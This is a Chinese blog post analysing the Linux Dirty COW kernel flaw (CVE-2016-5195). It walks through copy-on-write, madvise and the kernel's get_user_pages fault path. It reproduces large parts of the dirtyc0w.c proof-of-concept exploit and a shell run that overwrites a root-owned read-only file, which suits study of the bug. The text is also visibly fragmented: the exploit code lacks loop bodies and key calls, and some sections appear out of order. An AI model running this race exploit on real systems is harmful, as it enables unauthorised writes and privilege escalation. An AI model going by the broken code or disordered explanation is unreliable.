[原创]Linux内核[CVE-2016-5195] (dirty COW)原理分析
Ubuntu 16.04,内核版本4.15.0-45-generic






P1 P2是两个process,而P2由P1fork()产生。那么此时其实P1和P2是共享一块空间的。当对这同一块空间进行了修改时,才会拷贝出一份。


1.子进程中往往会调用exec()族的函数实现其具体的功能。(一个进程想要执行另一个程序。既然创建新进程的唯一方法为调用fork,该进程于是首先调用fork创建一个自身的拷贝,然后其中一个拷贝(通常为子进程)调用exec把自身替换成新的程序。这是诸如shell之类程序的典型用法) 。而exec族函数有一个特点是,当他执行成功时,控制流直接转向新的程序的起点(比如glibc pwn中最常用的,通过hijack mallochook去打one_gadget执行execve起shell)



Suppose, there is a process P1 that creates a new process P2 and then process P1 modifies page 3.
The below figures shows what happens before and after process P modifies page 3.

原型:int madvise(void *addr, size_t length, int advice);

告诉内核:在从 addr 指定的地址开始,长度等于 len 参数值的范围内,该区域的用户虚拟内存应遵循特定的使用模式。



1.首先我们创建了一个foo文件,并且他的权限是 只读

2.我们以read_only打开,返回了f=fd。并获取了对应的文件描述符的状态储存到st结构体中(类型struct stat )

3.接下来使用mmap将此文件的内容 以私有的写时复制 映射到了用户空间。其中各个参数代表的含义如下:



首先他以RDWR打开了 /proc/self/mem(对于当前进程来说,/proc/self/mem是进程的内存内容,通过修改该文件相当于直接修改当前进程的内存),但是如果你测试一下会发现:


我们在POC中将位置调整到mmap返回的位置(也就是文件被映射的位置)。SEEK_SET 参数告诉系统offset 即为新的读写位置。之后进行100000000次写操作来试图改变此内存的内容。(mmap的时候只有读权限




dirty COW正如其名:dirty(脏)、COW(写时复制)


write(f,str,strlen(str)) 时调用流如下:

底层调用mem_rw,此时的file结构体对应的是 /proc/self/mem。buf是用户态的要写入的内容,count为大小,ppos为偏移。


mm_struct 定义如下:






首先申请一个新的page,之后会进入 access_remote_vm

而 get_user_pages -> get_user_pages_locked -> \get_user_pages,这一系列调用是由于write系统调用在内核中会执行get_user_pages以获取需要写入的内存页。




接下来调用 faultin_page 进行处理。




第二次page fault结束后,FOLL_WRITE已经被置0.此时已经不再需要可写权限。

所以正常情况下,此时会拿到对应的内存页,然后可以直接做写操作。但是这个写操作是在mapped memory的,不会影响正常的磁盘文件。

但是这个时候如果出现线程madivseThread ,他将对应的mmap出来的空间设置为MADV_DONTNEED即在接下来不会被使用。此时内核将mapped memory对应的页表项置空(立刻换出对应的内存页)。第四次产生page fault

这样当再次write的时候,会触发page fault,由do_fault再次调页。而由于此时FOLL_WRITE为0,所以不会像第一次那样调入后由于写操作产生语义冲突。而是可以正常的返回对应的页,而接下来的写入操作会被同步到只读的文件中。从而造成了越权写。(因为没有做COW)




Copy on Write







KSM (Kernel Samepage Merging)


sudo wget https://mirror.tuna.tsinghua.edu.cn/kernel/v4.x/linux-4.4.tar.xz
make bzImage -j4
此标志通知内核,移近指定地址范围的下一个 LWP 就是将要访问此范围次数最多的 LWP。内核将相应地为此范围和 LWP 分配内存和其他资源。
此标志建议内核,许多进程或 LWP 将在系统内随机访问指定的地址范围。内核将相应地为此范围分配内存和其他资源。
Do not expect access in the near future.  (For the time being,
              the application is finished with the given range, so the
              kernel can free resources associated with it.)
####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -pthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
####################### dirtyc0w.c #######################
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>
void *map;
int f;
struct stat st;
char *name;
void *madviseThread(void *arg)
  char *str;
  int i,c=0;
You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
> This is achieved by racing the madvise(MADV_DONTNEED) system call
> while having the page of the executable mmapped in memory.
  printf("madvise %d\n\n",c);
void *procselfmemThread(void *arg)
  char *str;
You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
>  The in the wild exploit we are aware of doesn't work on Red Hat
>  Enterprise Linux 5 and 6 out of the box because on one side of
>  the race it writes to /proc/self/mem, but /proc/self/mem is not
>  writable on Red Hat Enterprise Linux 5 and 6.
  int f=open("/proc/self/mem",O_RDWR);
  int i,c=0;
  for(i=0;i<100000000;i++) {
You have to reset the file pointer to the memory position.
    lseek(f,(uintptr_t) map,SEEK_SET);
  printf("procselfmem %d\n\n", c);
int main(int argc,char *argv[])
You have to pass two arguments. File and Contents.
  if (argc<3) {
  (void)fprintf(stderr, "%s\n",
      "usage: dirtyc0w target_file new_content");
  return 1; }
  pthread_t pth1,pth2;
You have to open the file in read only mode.
You have to use MAP_PRIVATE for copy-on-write mapping.
> Create a private copy-on-write mapping.  Updates to the
> mapping are not visible to other processes mapping the same
> file, and are not carried through to the underlying file.  It
> is unspecified whether changes made to the file after the
> mmap() call are visible in the mapped region.
You have to open with PROT_READ.
  printf("mmap %zx\n\n",(uintptr_t) map);
You have to do it on two threads.
You have to wait for the threads to finish.
  return 0;
####################### dirtyc0w.c #######################
struct stat64 {
    unsigned long long    st_dev;
    unsigned char    __pad0[4];
    unsigned long    __st_ino;
    unsigned int    st_mode;
    unsigned int    st_nlink;
    unsigned long    st_uid;
    unsigned long    st_gid;
    unsigned long long    st_rdev;
    unsigned char    __pad3[4];
    long long    st_size;
    unsigned long    st_blksize;
    /* Number 512-byte blocks allocated. */
    unsigned long long    st_blocks;
    unsigned long    st_atime;
    unsigned long    st_atime_nsec;
    unsigned long    st_mtime;
    unsigned int    st_mtime_nsec;
    unsigned long    st_ctime;
    unsigned long    st_ctime_nsec;
    unsigned long long    st_ino;
void *mmap(void *addr, size_t length, int prot, int flags,
                  int fd, off_t offset);
root@ubuntu:~/linux-4.4-env# cat /proc/66310/mem
cat: /proc/66310/mem: Input/output error
off_t lseek(int fd, off_t offset, int whence);
static ssize_t mem_write(struct file *file, const char __user *buf,
             size_t count, loff_t *ppos)
    return mem_rw(file, (char __user*)buf, count, ppos, 1);
struct mm_struct {
    struct vm_area_struct * mmap;       /* list of VMAs */
    struct rb_root mm_rb;
    struct vm_area_struct * mmap_cache; /* last find_vma result */
    unsigned long (*get_unmapped_area) (struct file *filp,
                unsigned long addr, unsigned long len,
                unsigned long pgoff, unsigned long flags);
       unsigned long (*get_unmapped_exec_area) (struct file *filp,
                unsigned long addr, unsigned long len,
                unsigned long pgoff, unsigned long flags);
    void (*unmap_area) (struct mm_struct *mm, unsigned long addr);
    unsigned long mmap_base;        /* base of mmap area */
    unsigned long task_size;        /* size of task vm space */
     * RHEL6 special for bug 790921: this same variable can mean
     * two different things. If sysctl_unmap_area_factor is zero,
     * this means the largest hole below free_area_cache. If the
     * sysctl is set to a positive value, this variable is used
     * to count how much memory has been munmapped from this process
     * since the last time free_area_cache was reset back to mmap_base.
     * This is ugly, but necessary to preserve kABI.
    unsigned long cached_hole_size;
    unsigned long free_area_cache;      /* first hole of size cached_hole_size or larger */
    pgd_t * pgd;
    atomic_t mm_users;          /* How many users with user space? */
    atomic_t mm_count;          /* How many references to "struct mm_struct" (users count as 1) */
    int map_count;              /* number of VMAs */
    struct rw_semaphore mmap_sem;
    spinlock_t page_table_lock;     /* Protects page tables and some counters */
    struct list_head mmlist;        /* List of maybe swapped mm's.  These are globally strung
                         * together off init_mm.mmlist, and are protected
                         * by mmlist_lock
    /* Special counters, in some configurations protected by the
     * page_table_lock, in other configurations by being atomic.
    mm_counter_t _file_rss;
    mm_counter_t _anon_rss;
    mm_counter_t _swap_usage;
    unsigned long hiwater_rss;  /* High-watermark of RSS usage */
    unsigned long hiwater_vm;   /* High-water virtual memory usage */
    unsigned long total_vm, locked_vm, shared_vm, exec_vm;
    unsigned long stack_vm, reserved_vm, def_flags, nr_ptes;
    unsigned long start_code, end_code, start_data, end_data;
    unsigned long start_brk, brk, start_stack;
    unsigned long arg_start, arg_end, env_start, env_end;
    unsigned long saved_auxv[AT_VECTOR_SIZE]; /* for /proc/PID/auxv */
    struct linux_binfmt *binfmt;
    cpumask_t cpu_vm_mask;
    /* Architecture-specific MM context */
    mm_context_t context;
    /* Swap token stuff */
     * Last value of global fault stamp as seen by this process.
     * In other words, this value gives an indication of how long
     * it has been since this task got the token.
     * Look at mm/thrash.c
    unsigned int faultstamp;
    unsigned int token_priority;
    unsigned int last_interval;
    unsigned long flags; /* Must use atomic bitops to access the bits */
    struct core_state *core_state; /* coredumping support */
    spinlock_t      ioctx_lock;
    struct hlist_head   ioctx_list;
     * "owner" points to a task that is regarded as the canonical
     * user/owner of this mm. All of the following must be true in
     * order for it to be changed:
     * current == mm->owner
     * current->mm != mm
     * new_owner->mm == mm
     * new_owner->alloc_lock is held
    struct task_struct *owner;
    /* store ref to file /proc/<pid>/exe symlink points to */
    struct file *exe_file;
    unsigned long num_exe_file_vmas;
    struct mmu_notifier_mm *mmu_notifier_mm;
    pgtable_t pmd_huge_pte; /* protected by page_table_lock */
    /* reserved for Red Hat */
#ifdef __GENKSYMS__
    unsigned long rh_reserved[2];
    /* How many tasks sharing this mm are OOM_DISABLE */
    union {
        unsigned long rh_reserved_aux;
        atomic_t oom_disable_count;
    /* base of lib map area (ASCII armour) */
    unsigned long shlib_base;
 * access_remote_vm - access another process' address space
 * @mm:        the mm_struct of the target address space
 * @addr:    start address to access
 * @buf:    source or destination buffer
 * @len:    number of bytes to transfer
 * @write:    whether the access is a write
 * The caller must hold a reference on @mm.
int access_remote_vm(struct mm_struct *mm, unsigned long addr,
        void *buf, int len, int write)
    return __access_remote_vm(NULL, mm, addr, buf, len, write);
